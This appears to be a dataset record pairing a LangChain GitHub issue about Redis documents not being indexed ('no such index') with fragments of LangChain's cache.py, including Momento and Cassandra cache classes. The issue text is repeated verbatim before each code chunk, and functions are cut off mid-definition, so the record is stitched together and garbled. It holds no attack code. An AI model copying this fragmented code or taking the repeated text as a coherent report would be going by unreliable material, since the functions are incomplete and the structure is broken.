- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | cls,
cache_name: str,
ttl: timedelta,
*,
configuration: Optional[momento.config.Configuration] = None,
api_key: Optional[str] = None,
auth_token: Optional[str] = None,
**kwargs: Any,
) -> MomentoCache:
"""Construct cache from CacheClient parameters."""
try:
from momento import CacheClient, Configurations, CredentialProvider
except ImportError:
raise ImportError(
"Could not import momento python package. "
"Please install it with `pip install momento`."
)
if configuration is None:
configuration = Configurations.Laptop.v1()
try:
api_key = auth_token or get_from_env("auth_token", "MOMENTO_AUTH_TOKEN")
except ValueError:
api_key = api_key or get_from_env("api_key", "MOMENTO_API_KEY")
credentials = CredentialProvider.from_string(api_key)
cache_client = CacheClient(configuration, credentials, default_ttl=ttl)
return cls(cache_client, cache_name, ttl=ttl, **kwargs)
def __key(self, prompt: str, llm_string: str) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Compute cache key from prompt and associated model and settings.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model version and settings.
Returns:
str: The cache key.
"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Lookup llm generations in cache by prompt and associated model and settings.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model version and settings.
Raises:
SdkException: Momento service or network error
Returns:
Optional[RETURN_VAL_TYPE]: A list of language model generations.
"""
from momento.responses import CacheGet
generations: RETURN_VAL_TYPE = []
get_response = self.cache_client.get(
self.cache_name, self.__key(prompt, llm_string)
)
if isinstance(get_response, CacheGet.Hit):
value = get_response.value_string
generations = _load_generations_from_json(value)
elif isinstance(get_response, CacheGet.Miss):
pass
elif isinstance(get_response, CacheGet.Error):
raise get_response.inner_exception
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Store llm generations in cache.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model string.
return_val (RETURN_VAL_TYPE): A list of language model generations.
Raises:
SdkException: Momento service or network error
Exception: Unexpected response
"""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"Momento only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
key = self.__key(prompt, llm_string)
value = _dump_generations_to_json(return_val)
set_response = self.cache_client.set(self.cache_name, key, value, self.ttl)
from momento.responses import CacheSet
if isinstance(set_response, CacheSet.Success):
pass
elif isinstance(set_response, CacheSet.Error):
raise set_response.inner_exception
else:
raise Exception(f"Unexpected response: {set_response}")
def clear(self, **kwargs: Any) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Clear the cache.
Raises:
SdkException: Momento service or network error
"""
from momento.responses import CacheFlush
flush_response = self.cache_client.flush_cache(self.cache_name)
if isinstance(flush_response, CacheFlush.Success):
pass
elif isinstance(flush_response, CacheFlush.Error):
raise flush_response.inner_exception
CASSANDRA_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_cache"
CASSANDRA_CACHE_DEFAULT_TTL_SECONDS = None
class CassandraCache(BaseCache):
"""
Cache that uses Cassandra / Astra DB as a backend.
It uses a single Cassandra table.
The lookup keys (which get to form the primary key) are:
- prompt, a string
- llm_string, a deterministic str representation of the model parameters.
(needed to prevent collisions same-prompt-different-model collisions)
"""
def __init__( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | self,
session: Optional[CassandraSession] = None,
keyspace: Optional[str] = None,
table_name: str = CASSANDRA_CACHE_DEFAULT_TABLE_NAME,
ttl_seconds: Optional[int] = CASSANDRA_CACHE_DEFAULT_TTL_SECONDS,
skip_provisioning: bool = False,
):
"""
Initialize with a ready session and a keyspace name.
Args:
session (cassandra.cluster.Session): an open Cassandra session
keyspace (str): the keyspace to use for storing the cache
table_name (str): name of the Cassandra table to use as cache
ttl_seconds (optional int): time-to-live for cache entries
(default: None, i.e. forever)
"""
try:
from cassio.table import ElasticCassandraTable
except (ImportError, ModuleNotFoundError):
raise ValueError(
"Could not import cassio python package. "
"Please install it with `pip install cassio`."
)
self.session = session
self.keyspace = keyspace
self.table_name = table_name
self.ttl_seconds = ttl_seconds
self.kv_cache = ElasticCassandraTable(
session=self.session,
keyspace=self.keyspace, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | table=self.table_name,
keys=["llm_string", "prompt"],
primary_key_type=["TEXT", "TEXT"],
ttl_seconds=self.ttl_seconds,
skip_provisioning=skip_provisioning,
)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
item = self.kv_cache.get(
llm_string=_hash(llm_string),
prompt=_hash(prompt),
)
if item is not None:
generations = _loads_generations(item["body_blob"])
if generations is not None:
return generations
else:
return None
else:
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
blob = _dumps_generations(return_val)
self.kv_cache.put(
llm_string=_hash(llm_string),
prompt=_hash(prompt),
body_blob=blob,
)
def delete_through_llm( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | self, prompt: str, llm: LLM, stop: Optional[List[str]] = None
) -> None:
"""
A wrapper around `delete` with the LLM being passed.
In case the llm(prompt) calls have a `stop` param, you should pass it here
"""
llm_string = get_prompts(
{**llm.dict(), **{"stop": stop}},
[],
)[1]
return self.delete(prompt, llm_string=llm_string)
def delete(self, prompt: str, llm_string: str) -> None:
"""Evict from cache if there's an entry."""
return self.kv_cache.delete(
llm_string=_hash(llm_string),
prompt=_hash(prompt),
)
def clear(self, **kwargs: Any) -> None:
"""Clear cache. This is for all LLMs at once."""
self.kv_cache.clear()
CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC = "dot"
CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD = 0.85
CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_semantic_cache"
CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS = None
CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE = 16
class CassandraSemanticCache(BaseCache): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """
Cache that uses Cassandra as a vector-store backend for semantic
(i.e. similarity-based) lookup.
It uses a single (vector) Cassandra table and stores, in principle,
cached values from several LLMs, so the LLM's llm_string is part
of the rows' primary keys.
The similarity is based on one of several distance metrics (default: "dot").
If choosing another metric, the default threshold is to be re-tuned accordingly.
"""
def __init__(
self,
session: Optional[CassandraSession],
keyspace: Optional[str],
embedding: Embeddings,
table_name: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME,
distance_metric: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC,
score_threshold: float = CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD,
ttl_seconds: Optional[int] = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS,
skip_provisioning: bool = False,
):
"""
Initialize the cache with all relevant parameters.
Args:
session (cassandra.cluster.Session): an open Cassandra session
keyspace (str): the keyspace to use for storing the cache
embedding (Embedding): Embedding provider for semantic
encoding and search.
table_name (str): name of the Cassandra (vector) table
to use as cache |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | distance_metric (str, 'dot'): which measure to adopt for
similarity searches
score_threshold (optional float): numeric value to use as
cutoff for the similarity searches
ttl_seconds (optional int): time-to-live for cache entries
(default: None, i.e. forever)
The default score threshold is tuned to the default metric.
Tune it carefully yourself if switching to another distance metric.
"""
try:
from cassio.table import MetadataVectorCassandraTable
except (ImportError, ModuleNotFoundError):
raise ValueError(
"Could not import cassio python package. "
"Please install it with `pip install cassio`."
)
self.session = session
self.keyspace = keyspace
self.embedding = embedding
self.table_name = table_name
self.distance_metric = distance_metric
self.score_threshold = score_threshold
self.ttl_seconds = ttl_seconds
@lru_cache(maxsize=CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE)
def _cache_embedding(text: str) -> List[float]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | return self.embedding.embed_query(text=text)
self._get_embedding = _cache_embedding
self.embedding_dimension = self._get_embedding_dimension()
self.table = MetadataVectorCassandraTable(
session=self.session,
keyspace=self.keyspace,
table=self.table_name,
primary_key_type=["TEXT"],
vector_dimension=self.embedding_dimension,
ttl_seconds=self.ttl_seconds,
metadata_indexing=("allow", {"_llm_string_hash"}),
skip_provisioning=skip_provisioning,
)
def _get_embedding_dimension(self) -> int: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | return len(self._get_embedding(text="This is a sample sentence."))
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
embedding_vector = self._get_embedding(text=prompt)
llm_string_hash = _hash(llm_string)
body = _dumps_generations(return_val)
metadata = {
"_prompt": prompt,
"_llm_string_hash": llm_string_hash,
}
row_id = f"{_hash(prompt)}-{llm_string_hash}"
#
self.table.put(
body_blob=body,
vector=embedding_vector,
row_id=row_id,
metadata=metadata,
)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
hit_with_id = self.lookup_with_id(prompt, llm_string)
if hit_with_id is not None:
return hit_with_id[1]
else:
return None
def lookup_with_id( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | self, prompt: str, llm_string: str
) -> Optional[Tuple[str, RETURN_VAL_TYPE]]:
"""
Look up based on prompt and llm_string.
If there are hits, return (document_id, cached_entry)
"""
prompt_embedding: List[float] = self._get_embedding(text=prompt)
hits = list(
self.table.metric_ann_search(
vector=prompt_embedding,
metadata={"_llm_string_hash": _hash(llm_string)},
n=1,
metric=self.distance_metric,
metric_threshold=self.score_threshold,
)
)
if hits:
hit = hits[0]
generations = _loads_generations(hit["body_blob"])
if generations is not None:
return (
hit["row_id"],
generations,
)
else:
return None
else:
return None
def lookup_with_id_through_llm( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | self, prompt: str, llm: LLM, stop: Optional[List[str]] = None
) -> Optional[Tuple[str, RETURN_VAL_TYPE]]:
llm_string = get_prompts(
{**llm.dict(), **{"stop": stop}},
[],
)[1]
return self.lookup_with_id(prompt, llm_string=llm_string)
def delete_by_document_id(self, document_id: str) -> None:
"""
Given this is a "similarity search" cache, an invalidation pattern
that makes sense is first a lookup to get an ID, and then deleting
with that ID. This is for the second step.
"""
self.table.delete(row_id=document_id)
def clear(self, **kwargs: Any) -> None:
"""Clear the *whole* semantic cache."""
self.table.clear()
class FullMd5LLMCache(Base): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
